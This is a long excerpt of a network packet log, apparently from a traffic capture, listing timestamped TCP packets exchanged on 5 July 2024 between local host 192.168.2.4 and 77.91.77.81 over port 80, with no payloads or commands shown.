                                                                Jul 5, 2024 04:23:24.365482092 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365494013 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365530968 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365545034 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365555048 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365565062 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365581036 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365607977 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365637064 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365648031 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365658045 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365681887 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365700006 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365710974 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365721941 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365731001 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365741968 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365755081 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365780115 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365803003 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365840912 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365866899 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365876913 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365881920 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365907907 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365915060 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365926981 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365951061 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365962029 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365964890 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365993977 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366018057 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366030931 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366058111 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366095066 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366106033 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366138935 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366180897 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366192102 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366202116 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366213083 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366221905 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366224051 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366235018 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366254091 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366262913 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366266012 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366298914 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366419077 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366430998 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366466045 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366486073 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366496086 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366504908 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366516113 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366527081 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366534948 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366544008 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366554976 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366610050 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366621017 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366631031 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366642952 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366652966 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366677046 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366806984 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366817951 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366827011 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366848946 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366861105 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366914988 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366925955 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366934061 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366954088 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366961002 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366970062 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.366976976 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.366981983 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367006063 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367033005 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367105961 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367116928 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367125988 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367151022 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367171049 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367229939 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367248058 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367259026 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367266893 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367270947 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367281914 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367283106 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367295980 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367300034 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367306948 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367315054 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367319107 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.367341042 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.367352962 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.406131983 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406143904 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406155109 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406183004 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406194925 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406194925 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.406205893 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406215906 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.406233072 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.406258106 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408144951 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408155918 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408164978 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408176899 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408190012 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408194065 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408204079 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408227921 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408307076 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408317089 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408322096 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408328056 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408338070 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408354044 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408370972 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408416986 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408426046 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408462048 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408489943 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408499002 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408510923 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408528090 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408546925 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408556938 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.408557892 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408581018 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.408591986 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425239086 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425285101 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425287962 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425296068 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425312996 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425319910 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425326109 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425333977 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425338030 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425354004 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425360918 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425375938 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425401926 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425442934 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425457954 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425481081 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425493002 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425565004 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425575972 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425590038 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425601006 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425607920 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425627947 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425628901 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425638914 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425648928 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425648928 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425667048 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425674915 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425735950 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425745964 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425755978 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425765991 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425776958 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425781965 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425789118 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.425798893 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425812006 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.425836086 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.454804897 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454817057 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454827070 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454843998 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454853058 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.454855919 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454868078 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454885960 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.454896927 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454906940 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.454907894 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454920053 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454931021 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454933882 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.454941988 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.454961061 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.454986095 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455019951 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455064058 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455143929 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455153942 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455166101 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455178976 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455188036 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455189943 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455202103 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455210924 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455212116 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455225945 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455250025 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455276012 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455287933 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455297947 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455313921 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455317974 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455326080 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455326080 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455349922 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455363989 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455404997 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455446959 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455471992 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455482960 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455513000 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455527067 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455594063 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455605030 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455614090 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455625057 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455640078 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455645084 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455655098 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455666065 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455670118 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455679893 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455698967 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455729961 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455740929 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455754995 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455766916 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455776930 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455789089 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455815077 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455847979 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455858946 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455868006 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455878019 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455888987 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455890894 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455900908 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455910921 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.455912113 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455931902 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.455948114 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456207991 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456224918 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456257105 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456286907 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456299067 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456314087 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456326962 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456335068 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456338882 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456352949 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456374884 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456406116 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456415892 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456451893 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456547022 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456561089 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456593037 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456626892 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456636906 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456646919 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456659079 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456665993 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456671000 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456686974 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456700087 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456708908 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456711054 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456722021 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456733942 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.456737041 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456753969 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.456777096 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501385927 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501446009 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501451969 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501461983 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501471996 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501482964 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501487970 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501494884 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501508951 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501538038 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501568079 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501579046 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501588106 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501600027 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501610994 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501612902 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501622915 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501626968 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501652002 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501674891 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501691103 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501701117 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501737118 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501766920 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501777887 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501787901 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501799107 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501807928 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501811028 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501820087 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501827002 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501841068 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.501851082 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501868963 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.501893044 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.514846087 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.514894962 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.514899969 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.514921904 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.514933109 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.514961958 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.514970064 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.514981031 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.514986038 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515017986 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515096903 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515108109 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515117884 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515127897 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515141010 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515151024 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515161037 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515163898 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515176058 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515186071 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515187025 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515212059 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515235901 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515261889 CEST804975377.91.77.81192.168.2.4
